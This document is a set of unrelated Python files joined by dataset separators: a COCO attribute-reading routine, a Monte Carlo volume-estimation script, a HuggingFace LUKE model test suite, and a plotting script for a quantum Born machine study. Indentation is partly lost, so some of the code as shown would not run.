image2obj_insts = load_obj(os.path.join(attribs_dir_path, "image2obj_insts.pkl"))
attrib2string = load_obj(os.path.join(attribs_dir_path, "attrib2string.pkl"))
attrib_names = []
for key in sorted(attrib2string.keys()):
attrib_names.append(attrib2string[key])
# =============================================================================
# for a in attrib_names:
# b = a.split(" ")[-1]
# if not b:
# b = a.split(" ")[-2]
# print(b + " " + b + " ")#, a.split(" "))
# =============================================================================
# remove ignored attributes from attribute name list
attrib_selection_list = np.array(list(attrib_selection.values()), dtype=int)
attrib_ignore_selection_idxs = np.argwhere(attrib_selection_list == 0)
attrib_names = np.delete(attrib_names, attrib_ignore_selection_idxs).tolist()
attrib2attrib_inst_count = {}
attrib_image_count = {}
attrib2images = {}
for att_id, atts in list(attrib_inst2attrib_vector.items()):
instance_id = attrib_inst2obj_inst[att_id]
try:
coco_id = obj_inst2image[instance_id]
except:
del attrib_inst2attrib_vector[att_id]
continue
# remove ignored attributes from attribute arrays
atts = np.delete(atts, attrib_ignore_selection_idxs)
#atts = (atts * attrib_selection_list)
idxs_larger = np.argwhere(atts >= self.attrib_weight_threshold)
idxs_larger = [idx[0] for idx in idxs_larger]
idxs_too_small = atts < self.attrib_weight_threshold
# set attribute values in attribute array to zero if smaller than threshold
atts[idxs_too_small] = 0.0
attrib_inst2attrib_vector[att_id] = atts
# add larger attributes to count dict and attrib2images dict
for idx in idxs_larger:
if(idx not in attrib2attrib_inst_count):
attrib2attrib_inst_count[idx] = 1
else:
attrib2attrib_inst_count[idx] += 1
if(idx not in attrib2images):
attrib2images[idx] = {coco_id}
else:
attrib2images[idx].add(coco_id)
# generate image count dict for attribute appearance
for att_id, image_ids in attrib2images.items():
attrib_image_count[att_id] = len(image_ids)
# detect attributes with count lower than threshold
if(ignore_attrib_indices is None):
ignore_attrib_indices = []
for att_id, count in attrib_image_count.items():
if(count < self.attrib_min_appearance):
ignore_attrib_indices.append([att_id])
elif(not ignore_attrib_indices):
            raise ValueError("ignore_attrib_indices was given but is empty.")
attrib_names = np.delete(attrib_names, ignore_attrib_indices).tolist()
for image_id, obj_insts in image2obj_insts.items():
attrib_insts = []
for obj_inst in obj_insts:
if(obj_inst in obj_inst2attrib_inst):
attrib_insts.append(obj_inst2attrib_inst[obj_inst])
attrib_vectors = []
rem_list = []
for attrib_inst in attrib_insts:
if(attrib_inst in attrib_inst2attrib_vector):
attrib_vectors.append(attrib_inst2attrib_vector[attrib_inst])
else:
rem_list.append(attrib_inst)
for attrib_inst in rem_list:
attrib_insts.remove(attrib_inst)
atts = np.sum(attrib_vectors, axis=0)
idxs_larger = np.argwhere(atts > 0)
idxs_larger = [idx[0] for idx in idxs_larger]
n_attribs = min(len(idxs_larger), self.attribs_n_max_per_image)
atts_count = np.ones(atts.shape) * 99999
for idx in idxs_larger:
atts_count[idx] = attrib_image_count[idx]
final_attribs_idxs = np.argsort(atts_count)[:n_attribs]
for attrib_inst in attrib_insts:
atts_new = np.zeros(atts.shape)
for idx in final_attribs_idxs:
atts_new[idx] = attrib_inst2attrib_vector[attrib_inst][idx]
attrib_inst2attrib_vector[attrib_inst] = atts_new
# remove attributes from dicts which appear in less than config.attrib_min_appearance
attrib2attrib_inst_count = {}
attrib2images = {}
for att_id, atts in attrib_inst2attrib_vector.items():
instance_id = attrib_inst2obj_inst[att_id]
coco_id = obj_inst2image[instance_id]
atts = np.delete(atts, ignore_attrib_indices)
attrib_inst2attrib_vector[att_id] = atts
idxs_larger = np.argwhere(atts > 0)
idxs_larger = [idx[0] for idx in idxs_larger]
for idx in idxs_larger:
if(idx not in attrib2attrib_inst_count):
attrib2attrib_inst_count[idx] = 1
else:
attrib2attrib_inst_count[idx] += 1
if(idx not in attrib2images):
attrib2images[idx] = {coco_id}
else:
attrib2images[idx].add(coco_id)
attrib_image_count = {}
for att_id, image_ids in attrib2images.items():
attrib_image_count[att_id] = len(image_ids)
        # extract the image id list containing only images with non-ignored attributes and at least one attribute
image_ids = set(image_id for set_ in attrib2images.values() for image_id in set_)
# ATTENTION: image2obj_insts, obj_inst2attrib_inst, attrib_inst2attrib_vector still contain elements not appearing in image list
return list(image_ids), image2obj_insts, obj_inst2attrib_inst, attrib_inst2attrib_vector, ignore_attrib_indices, attrib_names, attrib_image_count, attrib2attrib_inst_count
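# --- Hypothetical usage sketch (added; the directory path is a placeholder, not part of the original file) ---
# reader = CocoAttributesReader('/data/coco_attributes')       # folder holding the *.pkl files loaded above
# image_id = next(iter(reader.image_ids))
# for obj_inst, attrib_indices in reader[image_id]:            # __getitem__ yields [object instance, attribute indices]
#     print(obj_inst, [reader.attrib_names[i] for i in attrib_indices])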
| StarcoderdataPython |
3230487 | # Authors:
# <NAME> (<EMAIL>)
# <NAME> (<EMAIL>)
import random, math
alturaCilindro = 1/2
ptosCircunfCilindro = 0
ptosCircunfCentro = 0
ptosCircunfInferior = 0
ptosCircunfSuperior = 0
ptosRuedaEsferica = 0
radioCircunfCilindro = 1/2
radioCircunfSuperior = 2
radioCircunfCentro = 4
radioCirunfInferior = 1
radioRuedaEsferica = 1/3
nsim=2000000
#def f(x, y):
# return math.sqrt(radioCircunfCentro**2 - x**2 -y**2)
def volumenCubo(lado):
return lado**3
def volumenEsferaParaError(radio):
return 4/3*math.pi*radio**3
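# Reasoning sketch for the hit-or-miss estimates below (added note, not original code):
# sampling (x, y, z) ~ U(0, r)^3 covers one octant of a sphere of radius r, so the hit fraction
# p estimates (V_sphere / 8) / r^3, hence V_sphere ~ p * (2r)^3 = p * volumenCubo(2*r).
# The cylinder cross-section is handled in 2-D: (x, y) ~ U(0, 1)^2 gives a quarter-disc hit
# fraction, and multiplying by 4 recovers the full disc area of radius 1/2, i.e. pi/4.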
for i in range(0,nsim):
    x=random.uniform(0, 1) #U(0,1)
    y=random.uniform(0, 1) #U(0,1)
if x**2 + y**2 <= radioCircunfCilindro**2:
ptosCircunfCilindro += 1
x=random.uniform(0, radioCircunfSuperior) #U(0,2)
y=random.uniform(0, radioCircunfSuperior) #U(0,2)
z=random.uniform(0, radioCircunfSuperior) #U(0,2)
if x**2 + y**2 + z**2 <= radioCircunfSuperior**2:
ptosCircunfSuperior += 1
x=random.uniform(0, radioCircunfCentro) #U(0,4)
y=random.uniform(0, radioCircunfCentro) #U(0,4)
z=random.uniform(0, radioCircunfCentro) #U(0,4)
if x**2 + y**2 + z**2 <= radioCircunfCentro**2:
ptosCircunfCentro += 1
x=random.uniform(0, radioCirunfInferior) #U(0,1)
y=random.uniform(0, radioCirunfInferior) #U(0,1)
z=random.uniform(0, radioCirunfInferior) #U(0,1)
if x**2 + y**2 + z**2 <= radioCirunfInferior**2:
ptosCircunfInferior += 1
x=random.uniform(0, radioRuedaEsferica) #U(0,1/3)
y=random.uniform(0, radioRuedaEsferica) #U(0,1/3)
z=random.uniform(0, radioRuedaEsferica) #U(0,1/3)
if x**2 + y**2 + z**2 <= radioRuedaEsferica**2:
ptosRuedaEsferica += 1
pSuperior = float(ptosCircunfSuperior)/float(nsim)
pCentro = float(ptosCircunfCentro)/float(nsim)
pInferior = float(ptosCircunfInferior)/float(nsim)
pRueda = float(ptosRuedaEsferica)/float(nsim)
# Upper cylinders
areaCircunfCilindroSuperior = 4*float(ptosCircunfCilindro)/float(nsim)
volumenCilindroSuperior = areaCircunfCilindroSuperior * alturaCilindro
volumenCilindrosSuperiores = volumenCilindroSuperior*2
errorCilindrosSuperiores = abs(volumenCilindrosSuperiores - math.pi*radioCircunfCilindro**2*alturaCilindro*2)
# Upper hemisphere
volumenCircunfSuperior = pSuperior * volumenCubo(radioCircunfSuperior*2)
volumenSemiesferaSuperior = volumenCircunfSuperior/2
errorCirunfSuperior = abs(volumenSemiesferaSuperior - volumenEsferaParaError(radioCircunfSuperior)/2)
# Central sphere
volumenCircunfCentro = pCentro * volumenCubo(radioCircunfCentro*2)
errorCirunfCentro = abs(volumenCircunfCentro - volumenEsferaParaError(radioCircunfCentro))
# Lower hemisphere
volumenCircunfInferior = pInferior * volumenCubo(radioCirunfInferior*2)
volumenSemiesferaInferior = volumenCircunfInferior/2
errorCirunfInferior = abs(volumenSemiesferaInferior - volumenEsferaParaError(radioCirunfInferior)/2)
# Lower wheels (small spheres)
volumenRueda = pRueda * volumenCubo(radioRuedaEsferica*2)
volumenRuedas = volumenRueda * 3
errorRuedas = abs(volumenRuedas - volumenEsferaParaError(radioRuedaEsferica)*3)
print('Volume of upper cylinders = ', volumenCilindrosSuperiores, 'Error = ', errorCilindrosSuperiores, 'Nsim ='+str(nsim) + '\n')
print('Volume of upper hemisphere = ', volumenSemiesferaSuperior, 'Error = ', errorCirunfSuperior, 'Nsim ='+str(nsim) + '\n')
print('Volume of central sphere = ', volumenCircunfCentro, 'Error = ', errorCirunfCentro, 'Nsim ='+str(nsim) + '\n')
print('Volume of lower hemisphere = ', volumenSemiesferaInferior, 'Error = ', errorCirunfInferior, 'Nsim ='+str(nsim) + '\n')
print('Volume of lower wheels = ', volumenRuedas, 'Error = ', errorRuedas, 'Nsim ='+str(nsim) + '\n')
print('Total volume = ', volumenCilindrosSuperiores + volumenSemiesferaSuperior + volumenCircunfCentro +
      volumenSemiesferaInferior + volumenRuedas, 'Error = ', errorCilindrosSuperiores + errorCirunfSuperior +
      errorCirunfCentro + errorCirunfInferior + errorRuedas, 'Nsim ='+str(nsim) + '\n') | StarcoderdataPython |
1675001 | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Testing suite for the PyTorch LUKE model. """
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
LukeConfig,
LukeForEntityClassification,
LukeForEntityPairClassification,
LukeForEntitySpanClassification,
LukeModel,
LukeTokenizer,
)
from transformers.models.luke.modeling_luke import LUKE_PRETRAINED_MODEL_ARCHIVE_LIST
class LukeModelTester:
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
entity_length=3,
mention_length=5,
use_attention_mask=True,
use_token_type_ids=True,
use_entity_ids=True,
use_entity_attention_mask=True,
use_entity_token_type_ids=True,
use_entity_position_ids=True,
use_labels=True,
vocab_size=99,
entity_vocab_size=10,
entity_emb_size=6,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_entity_classification_labels=9,
num_entity_pair_classification_labels=6,
num_entity_span_classification_labels=4,
use_entity_aware_attention=True,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.entity_length = entity_length
self.mention_length = mention_length
self.use_attention_mask = use_attention_mask
self.use_token_type_ids = use_token_type_ids
self.use_entity_ids = use_entity_ids
self.use_entity_attention_mask = use_entity_attention_mask
self.use_entity_token_type_ids = use_entity_token_type_ids
self.use_entity_position_ids = use_entity_position_ids
self.use_labels = use_labels
self.vocab_size = vocab_size
self.entity_vocab_size = entity_vocab_size
self.entity_emb_size = entity_emb_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_entity_classification_labels = num_entity_classification_labels
self.num_entity_pair_classification_labels = num_entity_pair_classification_labels
self.num_entity_span_classification_labels = num_entity_span_classification_labels
self.scope = scope
self.use_entity_aware_attention = use_entity_aware_attention
self.encoder_seq_length = seq_length
self.key_length = seq_length
self.num_hidden_states_types = 2 # hidden_states and entity_hidden_states
def prepare_config_and_inputs(self):
# prepare words
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
attention_mask = None
if self.use_attention_mask:
attention_mask = random_attention_mask([self.batch_size, self.seq_length])
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
# prepare entities
entity_ids = ids_tensor([self.batch_size, self.entity_length], self.entity_vocab_size)
entity_attention_mask = None
if self.use_entity_attention_mask:
entity_attention_mask = random_attention_mask([self.batch_size, self.entity_length])
entity_token_type_ids = None
if self.use_token_type_ids:
entity_token_type_ids = ids_tensor([self.batch_size, self.entity_length], self.type_vocab_size)
entity_position_ids = None
if self.use_entity_position_ids:
entity_position_ids = ids_tensor(
[self.batch_size, self.entity_length, self.mention_length], self.mention_length
)
sequence_labels = None
entity_classification_labels = None
entity_pair_classification_labels = None
entity_span_classification_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
entity_classification_labels = ids_tensor([self.batch_size], self.num_entity_classification_labels)
entity_pair_classification_labels = ids_tensor(
[self.batch_size], self.num_entity_pair_classification_labels
)
entity_span_classification_labels = ids_tensor(
[self.batch_size, self.entity_length], self.num_entity_span_classification_labels
)
config = LukeConfig(
vocab_size=self.vocab_size,
entity_vocab_size=self.entity_vocab_size,
entity_emb_size=self.entity_emb_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
intermediate_size=self.intermediate_size,
hidden_act=self.hidden_act,
hidden_dropout_prob=self.hidden_dropout_prob,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
is_decoder=False,
initializer_range=self.initializer_range,
use_entity_aware_attention=self.use_entity_aware_attention,
)
return (
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
)
def create_and_check_model(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
model = LukeModel(config=config)
model.to(torch_device)
model.eval()
# test with words + entities
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(
result.entity_last_hidden_state.shape, (self.batch_size, self.entity_length, self.hidden_size)
)
# test with words only
result = model(input_ids, token_type_ids=token_type_ids)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
def create_and_check_for_entity_classification(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
config.num_labels = self.num_entity_classification_labels
model = LukeForEntityClassification(config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
labels=entity_classification_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_entity_classification_labels))
def create_and_check_for_entity_pair_classification(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
config.num_labels = self.num_entity_pair_classification_labels
        model = LukeForEntityPairClassification(config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
labels=entity_pair_classification_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_entity_pair_classification_labels))
def create_and_check_for_entity_span_classification(
self,
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
):
config.num_labels = self.num_entity_span_classification_labels
model = LukeForEntitySpanClassification(config)
model.to(torch_device)
model.eval()
entity_start_positions = ids_tensor([self.batch_size, self.entity_length], self.seq_length)
entity_end_positions = ids_tensor([self.batch_size, self.entity_length], self.seq_length)
result = model(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
entity_start_positions=entity_start_positions,
entity_end_positions=entity_end_positions,
labels=entity_span_classification_labels,
)
self.parent.assertEqual(
result.logits.shape, (self.batch_size, self.entity_length, self.num_entity_span_classification_labels)
)
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
(
config,
input_ids,
attention_mask,
token_type_ids,
entity_ids,
entity_attention_mask,
entity_token_type_ids,
entity_position_ids,
sequence_labels,
entity_classification_labels,
entity_pair_classification_labels,
entity_span_classification_labels,
) = config_and_inputs
inputs_dict = {
"input_ids": input_ids,
"token_type_ids": token_type_ids,
"attention_mask": attention_mask,
"entity_ids": entity_ids,
"entity_token_type_ids": entity_token_type_ids,
"entity_attention_mask": entity_attention_mask,
"entity_position_ids": entity_position_ids,
}
return config, inputs_dict
@require_torch
class LukeModelTest(ModelTesterMixin, unittest.TestCase):
all_model_classes = (
(
LukeModel,
LukeForEntityClassification,
LukeForEntityPairClassification,
LukeForEntitySpanClassification,
)
if is_torch_available()
else ()
)
test_pruning = False
test_torchscript = False
test_resize_embeddings = True
test_head_masking = True
def _prepare_for_class(self, inputs_dict, model_class, return_labels=False):
inputs_dict = super()._prepare_for_class(inputs_dict, model_class, return_labels=return_labels)
if model_class == LukeForEntitySpanClassification:
inputs_dict["entity_start_positions"] = torch.zeros(
(self.model_tester.batch_size, self.model_tester.entity_length), dtype=torch.long, device=torch_device
)
inputs_dict["entity_end_positions"] = torch.ones(
(self.model_tester.batch_size, self.model_tester.entity_length), dtype=torch.long, device=torch_device
)
if return_labels:
if model_class in (LukeForEntityClassification, LukeForEntityPairClassification):
inputs_dict["labels"] = torch.zeros(
self.model_tester.batch_size, dtype=torch.long, device=torch_device
)
elif model_class == LukeForEntitySpanClassification:
inputs_dict["labels"] = torch.zeros(
(self.model_tester.batch_size, self.model_tester.entity_length),
dtype=torch.long,
device=torch_device,
)
return inputs_dict
def setUp(self):
self.model_tester = LukeModelTester(self)
self.config_tester = ConfigTester(self, config_class=LukeConfig, hidden_size=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_model(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in LUKE_PRETRAINED_MODEL_ARCHIVE_LIST:
model = LukeModel.from_pretrained(model_name)
self.assertIsNotNone(model)
def test_for_entity_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_for_entity_classification(*config_and_inputs)
def test_for_entity_pair_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_for_entity_pair_classification(*config_and_inputs)
def test_for_entity_span_classification(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_for_entity_span_classification(*config_and_inputs)
def test_attention_outputs(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
config.return_dict = True
seq_length = self.model_tester.seq_length
entity_length = self.model_tester.entity_length
key_length = seq_length + entity_length
for model_class in self.all_model_classes:
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = False
config.return_dict = True
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
# check that output_attentions also work using config
del inputs_dict["output_attentions"]
config.output_attentions = True
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs.attentions
self.assertEqual(len(attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, seq_length + entity_length, key_length],
)
out_len = len(outputs)
# Check attention is always last and order is fine
inputs_dict["output_attentions"] = True
inputs_dict["output_hidden_states"] = True
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
added_hidden_states = self.model_tester.num_hidden_states_types
self.assertEqual(out_len + added_hidden_states, len(outputs))
self_attentions = outputs.attentions
self.assertEqual(len(self_attentions), self.model_tester.num_hidden_layers)
self.assertListEqual(
list(self_attentions[0].shape[-3:]),
[self.model_tester.num_attention_heads, seq_length + entity_length, key_length],
)
def test_entity_hidden_states_output(self):
def check_hidden_states_output(inputs_dict, config, model_class):
model = model_class(config)
model.to(torch_device)
model.eval()
with torch.no_grad():
outputs = model(**self._prepare_for_class(inputs_dict, model_class))
entity_hidden_states = outputs.entity_hidden_states
expected_num_layers = getattr(
self.model_tester, "expected_num_hidden_layers", self.model_tester.num_hidden_layers + 1
)
self.assertEqual(len(entity_hidden_states), expected_num_layers)
entity_length = self.model_tester.entity_length
self.assertListEqual(
list(entity_hidden_states[0].shape[-2:]),
[entity_length, self.model_tester.hidden_size],
)
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
inputs_dict["output_hidden_states"] = True
check_hidden_states_output(inputs_dict, config, model_class)
# check that output_hidden_states also work using config
del inputs_dict["output_hidden_states"]
config.output_hidden_states = True
check_hidden_states_output(inputs_dict, config, model_class)
def test_retain_grad_entity_hidden_states(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
config.output_hidden_states = True
config.output_attentions = True
# no need to test all models as different heads yield the same functionality
model_class = self.all_model_classes[0]
model = model_class(config)
model.to(torch_device)
inputs = self._prepare_for_class(inputs_dict, model_class)
outputs = model(**inputs)
output = outputs[0]
entity_hidden_states = outputs.entity_hidden_states[0]
entity_hidden_states.retain_grad()
output.flatten()[0].backward(retain_graph=True)
self.assertIsNotNone(entity_hidden_states.grad)
@require_torch
class LukeModelIntegrationTests(unittest.TestCase):
@slow
def test_inference_base_model(self):
model = LukeModel.from_pretrained("studio-ousia/luke-base").eval()
model.to(torch_device)
tokenizer = LukeTokenizer.from_pretrained("studio-ousia/luke-base", task="entity_classification")
text = "Top seed <NAME> said on Thursday she could hardly believe her luck as a fortuitous netcord helped the new world number one avoid a humiliating second- round exit at Wimbledon ."
span = (39, 42)
encoding = tokenizer(text, entity_spans=[span], add_prefix_space=True, return_tensors="pt")
# move all values to device
for key, value in encoding.items():
encoding[key] = encoding[key].to(torch_device)
outputs = model(**encoding)
# Verify word hidden states
expected_shape = torch.Size((1, 42, 768))
self.assertEqual(outputs.last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor(
[[0.0037, 0.1368, -0.0091], [0.1099, 0.3329, -0.1095], [0.0765, 0.5335, 0.1179]]
).to(torch_device)
self.assertTrue(torch.allclose(outputs.last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
# Verify entity hidden states
expected_shape = torch.Size((1, 1, 768))
self.assertEqual(outputs.entity_last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor([[0.1457, 0.1044, 0.0174]]).to(torch_device)
self.assertTrue(torch.allclose(outputs.entity_last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
@slow
def test_inference_large_model(self):
model = LukeModel.from_pretrained("studio-ousia/luke-large").eval()
model.to(torch_device)
tokenizer = LukeTokenizer.from_pretrained("studio-ousia/luke-large", task="entity_classification")
text = "Top seed <NAME> said on Thursday she could hardly believe her luck as a fortuitous netcord helped the new world number one avoid a humiliating second- round exit at Wimbledon ."
span = (39, 42)
encoding = tokenizer(text, entity_spans=[span], add_prefix_space=True, return_tensors="pt")
# move all values to device
for key, value in encoding.items():
encoding[key] = encoding[key].to(torch_device)
outputs = model(**encoding)
# Verify word hidden states
expected_shape = torch.Size((1, 42, 1024))
self.assertEqual(outputs.last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor(
[[0.0133, 0.0865, 0.0095], [0.3093, -0.2576, -0.7418], [-0.1720, -0.2117, -0.2869]]
).to(torch_device)
self.assertTrue(torch.allclose(outputs.last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
# Verify entity hidden states
expected_shape = torch.Size((1, 1, 1024))
self.assertEqual(outputs.entity_last_hidden_state.shape, expected_shape)
expected_slice = torch.tensor([[0.0466, -0.0106, -0.0179]]).to(torch_device)
self.assertTrue(torch.allclose(outputs.entity_last_hidden_state[0, :3, :3], expected_slice, atol=1e-4))
| StarcoderdataPython |
3354036 | import numpy as np
import ast
import sys
import json
from auxiliary_functions import SampleListToArray
import matplotlib
from matplotlib import rc
rc('text', usetex=True)
rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
matplotlib.rc('xtick', labelsize=30)
matplotlib.rc('ytick', labelsize=30)
import matplotlib.pyplot as plt
from file_operations_in import ReadFromFile, AverageCostsFromFile
from file_operations_out import MakeTrialNameFile, MakeDirectory
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, mark_inset
'''
This file produces the various plots provided in 'The Born Supremacy: Quantum Advantage and Training of an Ising Born Machine'
'''
####################################################################################################################
# #Compare Costs
###################################################################################################################
def CompareCostFunctions(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs, comparison, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
    if all(x.lower() == 'mmd' for x in cost_func):
        #If all cost functions to be compared are the MMD, distinguish trials by marker and colour
plot_colour = ['r*-', 'r+-', 'ro-', 'b*-', 'b+-', 'bo-']
else:
plot_colour = ['green', 'darkorange', 'c', 'blue', 'red', 'm']
N_trials = len(N_epochs)
if comparison.lower() == 'probs':
fig, axs = plt.subplots()
data_plot_colour = 'k'
axs.clear()
x = np.arange(len(data_probs_final[0]))
bar_plot_colour = ['green', 'blue', 'red', 'm']
#Plot MMD
axs.bar(x, data_probs_final[0].values(), width=0.1, color= '%s' %data_plot_colour, align='center')
axs.bar(x-(0.2*(0+0.5)), born_final_probs[-5].values(), width=0.1, color='%s' %(bar_plot_colour[-4]), align='center')
axs.bar(x-(0.2*(0+1)), born_final_probs[-3].values(), width=0.1, color='%s' %(bar_plot_colour[-3]), align='center')
axs.bar(x-(0.2*(0+1.5)), born_final_probs[-2].values(), width=0.1, color='%s' %(bar_plot_colour[-2]), align='center')
axs.bar(x-(0.2*(0+2)), born_final_probs[-1].values(), width=0.1, color='%s' %(bar_plot_colour[-1]), align='center')
axs.legend(('Data',r'\textsf{MMD}', r'Sinkhorn', r'Exact Stein', r'Spectral Stein' ), fontsize = 20)
axs.set_xticks(range(len(data_probs_final[0])))
axs.set_xticklabels(list(data_probs_final[0].keys()),rotation=70)
elif comparison.lower() == 'tv':
fig, ax = plt.subplots()
if qc[0][0].lower() == '3':
axins = zoomed_inset_axes(ax, 5, loc='center')
x1, x2, y1, y2 = 190, 200, 0.00, 0.021 # specify the limits
elif qc[0][0].lower() == '4':
axins = zoomed_inset_axes(ax, 2.5, loc='center right')
x1, x2, y1, y2 = 180, 200, 0.02, 0.06 # specify the limits
elif qc[0][0].lower() == '5':
axins = zoomed_inset_axes(ax, 2.5, loc='upper left')
x1, x2, y1, y2 = 0,1 , 0.24, 0.25 # specify the limits
axins.set_xlim(x1, x2) # apply the x-limits
axins.set_ylim(y1, y2) # apply the y-limits
plt.xticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=1, fc="none", ec="0.5")
for trial in range(N_trials):
#Compute Average losses and errors, over a certain number of runs
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
cost_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
x = np.arange(0, N_epochs[trial]-1, 1)
if cost_func[trial].lower() == 'mmd':
ax.plot(x, average_loss['TV'], '-', color ='%s' % plot_colour[trial] , label =r'$\mathsf{MMD}$ for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %( kernel_type[trial][0], learning_rate[trial]))
